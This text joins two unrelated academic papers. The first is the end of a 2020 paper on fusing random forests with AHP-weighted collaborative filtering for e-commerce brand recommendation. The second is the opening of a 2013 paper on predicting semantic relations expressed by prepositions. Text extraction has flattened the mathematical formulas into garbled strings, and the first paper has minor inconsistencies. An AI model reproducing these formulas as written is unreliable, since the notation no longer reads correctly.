algorithm for attribute selection, and the information gain rate algorithm is given. According to the randomness peculiar to the random forest, first select k attributes as the features of the decision tree. These features all act as classifiers. From the calculation of the training set, we can know the classification standard h(x, θ) ∈ (0,1), x ∈ RN is a randomly selected training sample. θ = (α，φ) represents the parameter of this node, φ represents the matrix, α represents the filtering function, and the surface style of the node feature is determined by α, The Formula 6 represents the calculation of the nonlinear plane, and the calculation formula of the linear plane is Formula 7: h(x, θ) = δ(αT(x)φ > 0) (6) h(x, θ) = δ(αT(x)φα(x) > 0) (7) Use a recursive method to operate on the data set until the data on a node has all belonged to the same type of feature or the number of data sets on the node has reached the threshold set in advance, then this node will stop continuing to classify, Converted to a leaf node. If the above requirements are not met, the node will continue to randomly search for feature attributes for classification. Step 3: the formation of the forest. After repeating the first step and the second step several times, the resulting trees can be used to build random forests. First of all, according to the function of these trees, you can classify the training set, integrate the results of the data set processed by the decision tree, and vote. The final output of the algorithm is the result of the classification with the most votes. B. AHP model AHP (Analytic Hierarchy Process) is a method for making decisions based on the weight of layers. This method through further exploration and analysis of the root of more complex problems and their influencing factors, further proposed a qualitative method to quantify the problem, so as to provide more detailed quantitative information for decision-making. In this research, we adopt the method of analysing the weight of influencing factors in the analytic hierarchy process, and give corresponding weights to different operation behaviors, and then determine the similarity between different users and the similarity between different brands according to the obtained weights degree. The following is the specific process of calculating the weights: Step 1: decision-level analysis. First of all, through in-depth study of the problem, in the research process, the factors that have related relationships are analyzed and compared with each other, and each factor is arranged in layers to form a multi-layered hierarchical structure model. Through the analysis, we can know that the following four factors have the most impact on the user's future purchases: the number of user clicks on the product, whether the user has added the product to the shopping cart, whether the user has collected the product, and whether the user has purchased the product. Formed a structural model as shown below: Figure 1. Hierarchical model diagram Step 2: Construct the judgment matrix. First of all, it is necessary to compare all the influencing factors with each other. In the measurement, the introduction of relative scale is used to reduce the difficulty of comparing two different factors with each other, which further improves the accuracy. If you want to compare the influence of n elements A1, A2, … , An on the same goal, you will obtain two factors Aiand Aj each time. cij represents the ratio of the influence level of Ai and Aj on the goal. All the comparison results are also can be written as a comparison matrix: C = (cij)n ∗ n，cij > 0，cij = 1 cij (8) International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 4 The larger the value of cij , the higher the importance of Ai relative to Aj . In general, the differences between these factors are presented on a scale of 1-9. Step 3: Solve and test. The elements of W are the ranking weights of the relative importance of the factors at the same level to the factors at the previous level. This process is called hierarchical single sorting. Then, whether the hierarchical single sorting can be confirmed requires a consistency test. The so-called consistency test is Refers to the allowed range of inconsistency determined by the pairwise comparison matrix. The consistency index can be defined as: CI = λmax −n n−1 . Different CI values represent different meanings, the greater the CI, the more serious and obvious the inconsistency, the consistency ratio is defined as CR = CI RI . RI is defined as a random consistency indicator, its value is shown in the table below: TABLE I. RI VALUE TABLE C. Improved collaborative filtering algorithm Because Random Forest also has its own drawbacks, it can only recommend brands that have been in contact with users, and those brands that have not been in contact with users, Random Forest will not recommend it. Even the brand may meet the needs of users. At this time, AHP improved collaborative filtering algorithm is proposed to solve this problem [7]. Improve through the following steps. Step 1: use the AHP model to find the weight of user behavior. Because when calculating user similarity and brand similarity, collaborative filtering recommendation algorithm cannot treat all user interactions equally. Therefore, the AHP model is used to assign values to the behaviors of users. With this set of weights, the similarity between the user's image and the brand's image can be calculated, which solves the drawback of collaborative filtering recommendation. This set of weights can be trained using the AHP analysis model introduced in the previous section. Step 2: The user's rating data for the brand. The operation of scoring products on the e-commerce website, and the size of the rating also represents the user's love for the brand, Therefore, before calculating the user's similarity and brand's similarity, you first need to calculate the user's rating value for the brand. You can obtain the user's rating value for the brand by calculating the user operation type and frequency. The calculation formula is as follows: Ru,i = ∑ Op(c)Fp(c) C c=1 (9) Among them, u represents the user, i represents the brand, then Ru,irepresents the user's rating of the brand, Op(c) represents the weight of the user's operation type c , and Fp(c) represents the user The frequency of operations on the brand. From this we can get the matrix that Ru,i can be composed of: [ R11 R12 … R1n R21 R22 … R2n … … … … Rm1 Rm2 … Rmn ]. This is a matrix reflecting u and i interacting with each other. Based on these, the similarity between users and brands can be calculated. Step 3: Calculation of similarity. This is the most important link in the collaborative filtering recommendation algorithm. This article uses an attribute-based similarity algorithm. The similarity is to process the information of the user and its nearest neighbors, so the core part of the algorithm is that if the nearest neighbor is obtained, we conduct relevant research and analysis on it, and obtain the following method of the user's comprehensive similarity. The following is the formula for the user's rating similarity YSD1(u，i): YSD1 = ∑ (Ru,t−Au)∗(Ri,t−Ai)t∈Iu,i √∑ (Ru,t−Au)t∈Iu 2 ∗∑ (Ri,t−Ai) 2 t∈Ii (10) This formula compares the similarity of users u and i. Ru,t andRi,teach represent the rating value of users u and i on brand t, and the set of brands that user u has rated respectively represent For Iu. Similarly, all brands rated by user i. are denoted as Ii, and the intersection of those users who have shared a rating is Iu,i ; the average value of user u's rating in Iu is set to Au , similarly, in Ii The average value of user i score is set to Ai. The following formula represents the user's feature similarity YSD2 algorithm: International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 5 D(u, i) = √∑ (uk − ik) 2n k=1 (11) YSD2(u, i) = 1 1+D(u,i) (12) Formula 12 shows the weighted Euclidean Metric of users u and i, that is, the Euclidean distance, n represents the feature dimension of the user, and the k- th eigenvalues of users u and i will be represented by uk and ik, respectively. YSD2 illustrates the calculated similarity of features of users u and i. Based on the above calculation formula to obtain the user's similarity score YSD1 for the product and the user characteristic similarity YSD2 , the following formula is used to calculate the user's comprehensive similarity YSD: YSD(u, i) = w1 ∗ YSD1(u, i) + (1 − w1) ∗ YSD2(u, 1) (13) In these indicators, w1 is the combined weight of the user's comprehensive similarity. The actual value of the combined weight of the user's comprehensive similarity is determined by the degree of influence of the score similarity and the feature similarity on the user's comprehensive similarity. The calculation of brand similarity is the same as the calculation of user similarity. You only need to change the parameters, which will not be described in detail here. Step 4: the selection of the nearest neighbor. In order to achieve the purpose of accurate recommendation, it is necessary to accurately target the other neighbor users that match the user's interests, so the selection of the nearest neighbor is very important. Select the user's nearest neighbor and the brand's nearest neighbor, this article uses the Top-N method. The first step of this method is to calculate the similarity between other users, brands and target users, brands, and then sort the calculated similarity values. Step 5: Generate recommendations. Using the method described in step 3, we can obtain the nearest neighbor set NU[u] of the target user, and then we recommend the user according to the formula listed below: PU(t, u) = Au + ∑ (Ri,t−Ai)∗YSD(u,i) c i=1 ∑ YSD(u,i)ci=1 (14) Au is the average score of user u for all brands in the dataset, the value of c is the number of users in the nearest neighbor of user u., Ri,t is the nearest neighbor user i. of user u, For the rating made by the brand t, YSD(u, i) represents the user's overall similarity. PU means that the recommendation degree of this brand is recommended to the user u based on the result of the user recommendation. The brand-based recommendation idea is similar to the above, so I won’t elaborate more. D. Fusion of the two algorithms After introducing the basic characteristics of the random forest recommendation algorithm and the collaborative filtering recommendation algorithm, the parameters and the calculation process required, we use the characteristics of each other. For example, the random forest model can recommend brands that users have interacted with before, while the collaborative filtering algorithm recommends brands that have not interacted with users. Therefore, if the two models can be perfectly combined, the common advantages of the two algorithms can be combined, which plays a role in promoting strengths and avoiding weaknesses. All the information required for user recommendation can be included. Naturally, better recommendation results will be obtained. The model the accuracy is also more improved, as shown in detail in Figure 2 describes the fusion strategy of the two models: Figure 2. Schematic diagram of algorithm fusion process IV. EXPERIMENT AND RESULT ANALYSIS A. Experimental data and experimental environment In order to verify the efficiency of the improved algorithm model, we selected an e-commerce company's internal data set for testing, and analyzed and evaluated its performance. The data set contains all the behaviors of about 100,000 random users with behaviors within one week of the e-commerce company. Among them, user behaviors include clicks, purchases, favorites, and purchases. The data set contains users 99799, the number of goods 416202, the number of all actions 10015080, such a huge data set, if International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 6 you use traditional stand-alone operations, the time consumption is immeasurable, so using the Hadoop distributed system in a big data environment to perform distributed calculations on its data greatly improves the efficiency of the operation. The experimental operating environment is a Hadoop cluster. The cluster has one Master node and three Slave nodes, and all machines in the cluster have the same configuration. The cluster installation is configured under the CentOS-6.7 operating system, and the JDK1.8 environment is configured for both CentOS and Windows, and the code is compiled into the IDEA compiler on the Windows side. B. Algorithm evaluation index 1) Recall rate The number of items in the recommended list calculated by the algorithm is what consumers like, which is the recall rate of the algorithm. Formula 15 describes how to calculate the recall rate: R(Lu) = Lu∩Bu Bu (15) Among them, the item that user u likes is Lu, and the recommendation algorithm lists the product recommended by the consumer as Bu. 2) Accuracy The accuracy of the algorithm tests the ratio of the items in the recommended list given by the system to the items that consumers actually like. Formula 16 describes how to calculate the accuracy: P(Lu) = Lu∩Bu Lu (16) Among them, the item that user u likes is Lu, and the recommendation algorithm is denoted as Bu by the consumer's recommended product list. 3) F measure As shown in Formula 17: F = 2∗P∗R P+R (17) Since there is a negative correlation between the accuracy rate and the recall rate, it is necessary to fit the F measure, and the F score will prevail. As can be seen from the Formula 18, the prediction result hopes to cover more users and brands while ensuring accuracy. C. Random forest model experiment results There are two parameters that can be controlled by the random forest model, one is the number of random forest decision trees, and the other is the number of feature attributes that are randomly extracted to build the decision tree. The number of decision trees in the random forest model is KRF , and the selected parameters are KRF=100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, and the following experimental results can be obtained: Figure 3. The relationship between decision tree and result in random forest model It can be seen from the experimental result graph that the F value rises with the increase of the decision tree. After rising to 500, it basically tends to be gentle, so KRF is taken as 500. Also for the eigenvalues of random forests, not as many as possible, in order to ensure the stability of the model, through experiments, the following results are obtained: Figure 4. The relationship between the number of features and the results in the random forest model International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 7 It can be seen from the above experiment that when the number of decision trees is 500 and the number of features is 150, the random forest model has the best effect, that is, the F value is the highest. The final experimental results of the random forest model are shown in the table below. TABLE II. RANDOM FOREST MODEL FINAL EXPERIMENTAL RESULTS Accuracy Recall rate F measure 7.19 7.21 7.20 D. Experimental results of the hybrid algorithm The weight of user behavior in the improved collaborative filtering algorithm can be calculated according to AHP, as shown in the following table： TABLE III. USER BEHAVIOR WEIGHT Interaction type weight Click 0.08 Collection 0.12 Add to cart 0.30 Buy 0.50 The number n of brands recommended by the collaborative filtering algorithm is used as the parameter for the experiment. We take n = 600, 800, 1000, 1200, 1400, and 1600 to conduct the experiment. The experimental results are shown in the figure. Figure 5. The relationship between the recommended number of collaborative filtering algorithms and the result It can be seen from the experimental results that with the increase in the number of recommendations, the algorithm's recommendation performance is improving. When the number of brand recommendations is close to 1400, the recommendation effect is the best. The final experimental results of the fusion of the final collaborative filtering recommendation algorithm and the random forest algorithm are shown in the following table: TABLE IV. EXPERIMENTAL RESULTS OF FUSION ALGORITHM Accuracy Recall rate F measure 7.33 7.42 7.35 Due to the large number of data sets in this experiment and the time-consuming operation in a single machine, the above operations are performed under the distributed system Hadoop. In order to compare the advantages of Hadoop in data processing speed, the collaborative filtering and the design The algorithm and the processing time of the algorithm designed in this paper are compared in the Hadoop environment, as shown below: Figure 6. Time comparison chart Because the algorithm in this paper is more accurate than the traditional collaborative filtering algorithm and the calculation is relatively complicated, the time efficiency is slightly insufficient. However, if it is run in a Hadoop distributed cluster environment, the time efficiency is effectively improved by nearly 3 times. It can be seen that the current big data In a large environment, it is necessary to use Hadoop distributed clusters to process data. V. CONCLUSION This paper attempts a model that uses different prediction and recommendation methods for prediction and recommendation, namely the random forest model, and gives a detailed introduction and further analysis of this model. This article also gives a detailed International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 8 introduction to the basic principles of the traditional filtering algorithm of collaborative filtering, and thoroughly analyzes the advantages and disadvantages of the algorithm. For example, this traditional collaborative filtering algorithm lacks the ability to calculate the brand score of users. Personalized investigation, treat all user behavior as the same. In view of the limitation of this traditional algorithm, this paper made some necessary improvements, and proposed the optimization of collaborative filtering similarity based on the weight of AHP. In addition, from two perspectives, user interaction and brand interaction, this article randomly integrates the collaborative filtering model with the random forest model. This will result in more accurate recommendation results, and the recall rate will naturally increase. Finally, the data is analyzed through real data cases to obtain reliable experimental results. The results show that the combination of this analytic hierarchy process and collaborative filtering algorithm makes the recommendation performance better than a single collaborative filtering algorithm. And after being fused with the random forest model, compared with the single random forest algorithm or collaborative filtering algorithm, the performance has been greatly improved. REFERENCES [1] Lu Xiaocui. The application of big data analysis technology in cross- border e-commerce[J]. Electronic Technology and Software Engineering, 2020 (01): 141-142. [2] Tian Bin. Big data machine learning under the framework of distributed computing[J]. Electronic Technology and Software Engineering, 2019(20):168-169. [3] Yang Wu, Tang Rui, Lu Ling. News recommendation method combining content-based recommendation and collaborative filtering[J]. Computer Applications, 2016, 36(02):414-418. [4] Yang Hailong. Power recommendation system based on item-based collaborative filtering algorithm[D]. Lanzhou Jiaotong University, 2019. [5] Sheng Wenshun, Sun Yanwen. An improved ID3 decision algorithm and its application[J]. Computer and Digital Engineering, 2019, 47(12):2943-2945+3094. [6] Wang Jingna. Research on used car valuation model based on random forest algorithm[D]. Beijing Jiaotong University, 2019. [7] Cui Yan, Qi Wei, Pang Hailong, Zhao Hui. A recommendation algorithm combining collaborative filtering and XGBoost[J]. Computer Application Research, 2020, 37(01):62-65. work_nu5xpentbrcxdlcdt3lmatbur4 ---- Transactions of the Association for Computational Linguistics, 1 (2013) 231–242. Action Editor: Noah Smith. Submitted 11/2012; Revised 2/2013; Published 5/2013. c©2013 Association for Computational Linguistics. Modeling Semantic Relations Expressed by Prepositions Vivek Srikumar and Dan Roth University of Illinois, Urbana-Champaign Urbana, IL. 61801. {vsrikum2, danr}@illinois.edu Abstract This paper introduces the problem of predict- ing semantic relations expressed by preposi- tions and develops statistical learning models for predicting the relations, their arguments and the semantic types of the arguments. We define an inventory of 32 relations, build- ing on the word sense disambiguation task for prepositions and collapsing related senses across prepositions. Given a preposition in a sentence, our computational task to jointly model the preposition relation and its argu- ments along with their semantic types, as a way to support the relation prediction. The an- notated data, however, only provides labels for the relation label, and not the arguments and types. We address this by presenting two mod- els for preposition relation labeling. Our gen- eralization of latent structure SVM gives close to 90% accuracy on relation labeling. Further, by jointly predicting the relation, arguments, and their types along with preposition sense, we show that we can not only improve the re- lation accuracy, but also significantly improve sense prediction accuracy. 1 Introduction This paper addresses the problem of predicting se- mantic relations conveyed by prepositions in text. Prepositions express many semantic relations be- tween their governor and object. Predicting these can help advancing text understanding tasks like question answering and textual entailment. Consider the sentence: (1) The book of Prof. Alexander on primary school methods is a valuable teaching resource. Here, the preposition on indicates that the book and primary school methods are connected by the relation Topic and of indicates the Creator- Creation relation between Prof. Alexander and the book. Predicting these relations can help answer questions about the subject of the book and also rec- ognize the entailment of sentences like Prof. Alexan- der has written about primary school methods. Being highly polysemous, the same preposition can indicate different kinds of relations, depending on its governor and object. Furthermore, several prepositions can indicate the same semantic relation. For example, consider the sentence: (2) Poor care led to her death from pneumonia. The preposition from in this sentence expresses the relation Cause(death, pneumonia). In a differ- ent context, it can denote other relations, as in the phrases copied from the film (Source) and recog- nized from the start (Temporal). On the other hand, the relation Cause can be expressed by sev- eral prepositions; for example, the following phrases express a Cause relation: died of pneumonia and tired after the surgery. We characterize semantic relations expressed by transitive prepositions and develop accurate models for predicting the relations, identifying their argu- ments and recognizing the semantic types of the ar- guments. Building on the word sense disambigua- tion task for prepositions, we collapse semantically related senses across prepositions to derive our re- lation inventory. These relations act as predicates in a predicate-argument representation, where the arguments are the governor and the object of the 231 preposition. While ascertaining the arguments is a largely syntactic decision, we point out that syn- tactic parsers do not always make this prediction correctly. However, as illustrated in the examples above, identifying the relation depends on the gov- ernor and object of the preposition. Given a sentence and a preposition, our goal is to model the predicate (i.e. the preposition rela- tion) and its arguments (i.e. the governor and ob- ject). Very often, the relation label is not influenced by the surface form of the arguments but rather by their semantic types. In sentence (2) above, we want the predicate to be Cause when the object of the preposition is any illness. We thus suggest to model the argument types along with the preposi- tion relations and arguments, using different notions of types. These three related aspects of the rela- tion prediction task are further explained in Section 3 leading up to the problem definition. Though we wish to predict relations, arguments and types, there is no corpus which annotates all three. The SemEval 2007 shared task of word sense disambiguation for prepositions provides sense an- notations for prepositions. We use this data to gen- erate training and test corpora for the relation la- bels. In Section 4, we present two models for the prepositional relation identification problem. The first model considers all possible argument candi- dates from various sources along with all argument types to predict the preposition relation label. The second model treats the arguments and types as la- tent variables during learning using a generalization of the latent structural SVM of (Yu and Joachims, 2009). We show in Section 5 that this model not only predicts the arguments and types, but also im- proves relation prediction performance. The primary contributions of this paper are: 1. We introduce a new inventory of preposition relations that covers the 34 prepositions that formed the basis of the SemEval 2007 task of preposition sense disambiguation. 2. We model preposition relations, arguments and their types jointly and propose a learning algo- rithm that learns to predict all three using train- ing data that annotates only relation labels. 3. We show that jointly predicting relations with word sense not only improves the relation pre- dictor, but also gives a significant improvement in sense prediction. 2 Prepositions & Predicate-Argument Semantics Semantic role labeling (cf. (Gildea and Jurafsky, 2002; Palmer et al., 2010; Punyakanok et al., 2008) and others) is the task of converting text into a predicate-argument representation. Given a trigger word or phrase in a sentence, this task solves two related prediction problems: (a) identifying the rela- tion label, and (b) identifying and labeling the argu- ments of the relation. This problem has been studied in the con- text of verb and nominal triggers using the Prop- Bank (Palmer et al., 2005) and NomBank (Meyers et al., 2004) annotations over the Penn Treebank, and also using the FrameNet lexicon (Fillmore et al., 2003), which allows arbitrary words to trigger semantic frames. This paper focuses on semantic relations ex- pressed by transitive prepositions1. We can define the two prediction tasks for prepositions as follows: identifying the relation label for a preposition, and predicting the arguments of the relation. Preposi- tions can mark arguments (both core and adjunct) for verbal and nominal predicates. In addition, they can also trigger relations that are not part of other predicates. For example, in sentence (3) below, the prepositional phrase starting with to is an argument of the verb visit, but the in triggers an independent relation indicating the location of the aquarium. (3) The children enjoyed the visit to the aquarium in Coney Island. FrameNet covers some prepositional relations, but allows only temporal, locative and directional senses of prepositions to evoke frames, accounting for only 3% of the targets in the SemEval 2007 shared task of FrameNet parsing. In fact, the state-of-the-art FrameNet parser of (Das et al., 2010) does not con- sider any frame inducing prepositions. (Baldwin et al., 2009) highlights the importance of studying prepositions for a complete linguistic 1By transitive prepositions we refer to the standard usage of prepositions that take an object. In particular, we do not con- sider prepositional particles in our analysis. 232 analysis of sentences and surveys work in the NLP literature that addresses the syntax and semantics of prepositions. One line of work (Ye and Bald- win, 2006) addressed the problem of preposition semantic role labeling by considering prepositional phrases that act as arguments of verbs according to the PropBank annotation. They built a system that predicts the labels of these prepositional phrases alone. However, by definition, this covered only verb-attached prepositions. (Zapirain et al., 2012) studied the impact of automatically learned selec- tional preferences for predicting arguments of verbs and showed that modeling prepositional phrases sep- arately improves the performance of argument pre- diction. Preposition semantics has also been studied via the Preposition Project (Litkowski and Har- graves, 2005) and the related SemEval 2007 shared task of word sense disambiguation of prepositions (Litkowski and Hargraves, 2007). The Preposi- tion Project identifies preposition senses based on their definitions in the Oxford Dictionary of English. There are 332 different labels to be predicted with a wide variance in the number of senses per preposi- tion ranging from 2 (during and as) to 25 (on). For example, according to the preposition sense inven- tory, the preposition from in sentence (2) above will be labeled with the sense from:12(9) to indicate a cause. (Dahlmeier et al., 2009) added sense anno- tation to seven prepositions in four sections of the Penn Treebank with the goal of studying their inter- action with verb arguments. Using the SemEval data, (Tratz and Hovy, 2009) and (Hovy et al., 2010) showed that the arguments offer an important cue to identify the sense of the preposition and (Tratz, 2011) showed further im- provements by refining the sense inventory. How- ever, though these works used a dependency parser to identify arguments, in order to overcome parsing errors, they augment the parser’s predictions using part-of-speech based heuristics. We argue that, while disambiguating the sense of a preposition does indeed reveal nuances of its meaning, it leads to a proliferation of labels to be predicted. Most importantly, sense labels do not transfer to other prepositions that express the same meaning. For example, both finish lunch before noon and finish lunch by noon express a Temporal relation. According to the Preposition Project, the sense label for the first preposition is before:1(1), and that for the second is by:17(4). This both de- feats the purpose of identifying the relations to aid natural language understanding and makes the pre- diction task harder than it should be: using the stan- dard word sense classification approach, we need to train a separate classifier for each word because the labels are defined per-preposition. In other words, we cannot share features across the different prepo- sitions. This motivates the need to combine such senses of prepositions into the same class label. In this direction, (O’Hara and Wiebe, 2009) de- scribes an inventory of preposition relations ob- tained using Penn Treebank function tags and frame elements from FrameNet. (Srikumar and Roth, 2011) merged preposition senses of seven preposi- tions into relation labels. (Litkowski, 2012) also suggests collapsing the definitions of prepositions into a smaller set of semantic classes. To aid bet- ter generalization and to reduce the label complex- ity, we follow this line of work to define a set of rela- tion labels which abstract word senses across prepo- sitions2. 3 Preposition-triggered Relations This section describes the inventory of preposition relations introduced in this paper, and then identifies the components of the preposition relation extraction problem. 3.1 Preposition Relation Inventory We build our relation inventory using the sense an- notation in the Preposition Project, focusing on the 34 prepositions3 annotated for the SemEval-2007 shared task of preposition sense disambiguation. As discussed in Section 2, we construct the in- ventory of preposition relations by collapsing se- mantically related preposition senses across differ- 2Since the preposition sense data is annotated over FrameNet sentences, sense annotation can be used to extend FrameNet (Litkowski, 2012). We believe that the abstract la- bels proposed in this paper can further help in this effort. 3We consider the following prepositions: about, above, across, after, against, along, among, around, as, at, before, be- hind, beneath, beside, between, by, down, during, for, from, in, inside, into, like, of, off, on, onto, over, round, through, to, to- wards, and with. This does not include multi-word prepositions such as because of and due to. 233 ent prepositions. For each sense that is defined, the Preposition Project also specifies related prepo- sitions. These definitions and related prepositions provide a starting point to identify senses that can be merged across prepositions. We followed this with a manual cleanup phase. Some senses do not cleanly align with a single relation because the def- initions include idiomatic or figurative usage. For example, the sense in:7(5) of the preposition in, ac- cording to the definition, includes both spatial and figurative notions of the spatial sense (that is, both in London and in a film). In such cases, we sam- pled 20 examples from the SemEval 2007 training set and assigned the relation label based on majority. If sufficient examples could not be sampled, these senses were added to the label Other, which is not a semantically coherent category and represents the ‘overflow’ case. Overall, we have 32 labels, which are listed in Table 14. A companion publication (available on the authors’ website) provides detailed definitions of each relation and the senses that were merged to create each label. Since we define relations to be groups of preposition sense labels, each sense can be uniquely mapped to a relation label. Hence, we can use the annotated sense data from SemEval 2007 to obtain a corpus of relation-labeled sentences. To validate the labeling scheme, two native speak- ers of English annotated 200 sentences from the SemEval training corpus using only the definitions of the labels as the annotation guidelines. We mea- sured Cohen’s kappa coefficient (Cohen, 1960) be- tween the annotators to be 0.75 and also between each annotator and the original corpus to be 0.76 and 0.74 respectively. 3.2 Preposition Relation Extraction The input to the prediction problem consists of a preposition in a sentence and the goal is to jointly model the following: (i) The relation expressed by the preposition, and (ii) The arguments of the rela- tion, namely the governor and the object. We use sentence (2) in the introduction as our run- ning example the following discussion. In our run- 4Note that, even though we do not consider intransitive prepositions, the definitions of some relations in Table 1 could be extended apply to prepositional particles such drive down (Direction) and run about (Manner). Relation Name Example Activity good at boxing Agent opened by Annie Attribute walls of stone Beneficiary fight for Napoleon Cause died of cancer Co-Participants pick one among these Destination leaving for London Direction drove towards the border EndState driven to tears Experiencer warm towards her Instrument cut with a knife Journey travel by road Location living in London Manner scream like an animal MediumOfCommunication new show on TV Numeric increase by 10% ObjectOfVerb murder of the boys Opponent/Contrast fight with him Other all others Participant/Accompanier steak with wine PartWhole member of gang PhysicalSupport lean against the wall Possessor son of a friend ProfessionalAspect works in publishing Purpose tools for making it Recipient unkind to her Separation ousted from power Source purchased from the shop Species city of Prague StartState recover from illness Temporal arrived on Monday Topic books on Shakespeare Table 1: List of preposition relations ning example, the relation label is Cause. We rep- resent the predicted relation label by r. Arguments The relation label crucially depends on correctly identifying the arguments of the prepo- sition, which are death and pneumonia in our run- ning example. While a parser can identify the argu- ments of a preposition, simply relying on the parser may impose an upper limit on the accuracy of rela- tion prediction. We build an oracle experiment to highlight this limitation. Table 2 shows the recall of the easy-first dependency parser of (Goldberg and Elhadad, 2010) on Section 23 of the Penn Treebank for identifying the governor and object of prepositions. We define heuristics that generate a candidate governors and objects for a preposition. For the gov- 234 ernor, this set includes the previous verb or noun and for the object, it includes only the next noun. The row labeled Best(Parser, Heuristics) shows the performance of an oracle predictor which selects the true governor/object if present among the parser’s prediction and the heuristics. We see that, even for the in-domain case, if we are able to re-rank the can- didates, we could achieve a big improvement in ar- gument identification. Recall Governor Object Parser 88.88 92.37 Best(Parser, Heuristics) 92.50 93.06 Table 2: Identifying governor and object of prepositions in the Penn Treebank data. Here, Best(Parser, Heuris- tics) reports the performance of an oracle that picks the true governor and object, if present among the candidates presented by the parser and the heuristic. This presents an in-domain upper bound for governor and object detec- tion. See text for further details. To overcome erroneous parser decisions, we en- tertain governor and object candidates proposed both by the parser and the heuristics. In the follow- ing discussion, we denote the chosen governor and object by g and o respectively. Argument types While the primary purpose of this work is to model preposition relations and their arguments, the relation prediction is strongly depen- dent on the semantic type of the arguments. To il- lustrate this, consider the following incomplete sen- tence: The message was delivered at · · · . This preposition can express both a Temporal or a Location relation depending on the object (for ex- ample, noon vs. the doorstep). (Agirre et al., 2008) shows that modeling the se- mantic type of the arguments jointly with attachment can improve PP attachment accuracy. In this work, we point out that argument types should be modeled jointly with both aspects of the problem of preposi- tion relation labeling. Types are an abstraction that capture common properties of groups of entities. For example, Word- Net provides generalizations of words in the form of their hypernyms. In our running example, we wish to generalize the relation label for death from pneu- monia to include cases such as suffering from flu. Figure 1 shows the hypernym hierarchy for the word pneumonia. In this case, synsets in the hypernym hierarchy, like pathological state or physical condi- tion, would also include ailments like flu. pneumonia => respiratory disease => disease => illness => ill health => pathological state => physical condition => condition => state => attribute => abstraction => entity Figure 1: Hypernym hierarchy for the word pneumonia We define a semantic type to be a cluster of words. In addition to WordNet hypernyms, we also cluster verbs, nouns and adjectives using the dependency- based word similarity of (Lin, 1998) and treat cluster membership as types. These are described in detail in Section 5.1. Relation prediction involves not only identifying the arguments, but also selecting the right semantic type for them, which together, help predicting the relation label. Given an argument candidate and a collection of possible types (given by WordNet or the similarity based clusters), we need to select one of the types. For example, in the WordNet case, we need to pick one of the hypernyms in the hypernym hierarchy. Thus, for the governor and object, we have a set of type labels, comprised of one element for each type category. We denote this by tg (gover- nor type) and to (object type) respectively. 3.3 Problem definition The input to our prediction task is a preposition in a sentence. Our goal is to jointly model the relation it expresses, the governor and the object of the rela- tion and the types of each argument (both WordNet hypernyms and cluster membership). We denote the input by x, which consists not only of the prepo- sition but also a set of candidates for the governor and the object and, for each type category, the list of types for the governor and candidate. 235 The prediction, which we denote by y, consists of the relation r, which can be one of the valid re- lation labels in Table 1 and the governor and object, denoted by g and o, each of which is one of text seg- ments proposed by the parser or the heuristics. Ad- ditionally, y also consists of type predictions for the governor and object, denoted by tg and to respec- tively, each of which is a vector of labels, one for each type category. Table 3 summarizes the nota- tion described above. We refer to the ith element of vectors using subscripts and use the superscript ∗ to denote gold labels. Recall that we have gold labels only for the relation labels and not for arguments and their types. Symbol Meaning x Input (pre-processed sentence and preposition) r relation label for the preposition g,o governor and object of the relation tg,to vectors of type assignments for governor and object respectively y Full structure (r,g,o,tg,to) Table 3: Summary of notation 4 Learning preposition relations A key challenge in modeling preposition relations is that our training data only annotates the relation la- bels and not the arguments and types. In this section, we introduce two approaches for predicting preposi- tion relations using this data. 4.1 Feature Representation We use the notation Φ(x,y) to indicate the feature function for an input x and the full output y. We build Φ using the features of the components of y: 1. Arguments: For g and o, which represent an assignment to the governor and object, we de- note the features extracted from the arguments as φA(x,g) and φA(x,o) respectively. 2. Types: Given a type assignment tgi to the i th type category of the governor, we define fea- tures φT (x,g,t g i ). Similarly, we define features φT (x,o,t o i ) for the types of the object. We combine the argument and their type features to define the features for classifying the relation, which we denote by φ(x,g,o,tg,to): φ = ∑ a∈{g,o} ( φA(x,a) + ∑ i φT (x,a,t a i ) ) (1) Section 5 describes the actual features used in our experiments. Observe that given the arguments and their types, the task of predicting relations is simply a multiclass classification problem. Thus, following the standard convention for multiclass classification, the overall feature representation for the relation and argument prediction is defined by conjoining the relation r with features for the corresponding arguments and types, φ. This gives us the full feature representa- tion, Φ(x,y). 4.2 Model 1: Predicting only relations The first model aims at predicting only the rela- tion labels and not the arguments and types. This falls into the standard multiclass classification set- ting, where we wish to predict one of 32 labels. To do so, we sum over all the possible assignments to the rest of the structure and define features for the inputs as φ̂(x) = ∑ g,o,tg,to φ(x,g,o,tg,to) (2) Effectively, doing so uses all the governor and ob- ject candidates and all their semantic types to get a feature representation for the relation classifica- tion problem. Once again, for a relation label r, the overall feature representation is defined by conjoin- ing the relation r with the features for that relation φ̂, which we write as φR(x,r). Note that this sum- mation is computationally inexpensive in our case because the sum decomposes according to equation (1). With a learned weight vector w, the relation label is predicted as r = arg max r′ wT φR(x,r ′) (3) We use a structural SVM (Tsochantaridis et al., 2004) to train a weight vector w that predicts the re- lation label as above. The training is parameterized by C, which represents the tradeoff between gener- alization and the hinge loss. 236 4.3 Model 2: Learning from partial annotations In the second model, even though our annotation does not provide gold labels for arguments and types, our goal is to predict them. At inference time, if we had a weight vector w, we could predict the full structure using inference as follows: y = arg max y′ wT Φ(x,y) (4) We propose an iterative learning algorithm to learn this weight vector. In the following discussion, for a labeled example (x,y∗), we refer to the missing part of its structure as h(y∗). That is, h(y∗) is the assignment to the arguments of the relation and their types. We use the notation r(y) to denote the relation label specified by a structure y. Our learning algorithm is closely related to re- cently developed latent variable based frameworks (Yu and Joachims, 2009; Chang et al., 2010a; Chang et al., 2010b), where the supervision provides only partial annotation. We begin by defining two addi- tional inference procedures: 1. Latent Inference: Given a weight vector w and a partially labeled example (x,y∗), we can ‘complete’ the rest of the structure by infer- ring the highest scoring assignment to the miss- ing parts. In the algorithm, we call this pro- cedure LatentInf(w,x,y∗), which solves the following maximization problem: ŷ = arg maxy w T Φ(x,y), (5) s.t. r(y) = r(y∗). 2. Loss augmented inference: This is a variant of the the standard loss augmented inference for structural SVMs, which solves the follow- ing maximization problem for a given x and fully labeled y∗: arg max y wT Φ(x,y) + ∆(y,y∗) (6) Here, ∆(y,y∗) denotes the loss function. In the standard structural SVMs, the loss is over the entire structure. In the Latent Structural SVM formulation of (Yu and 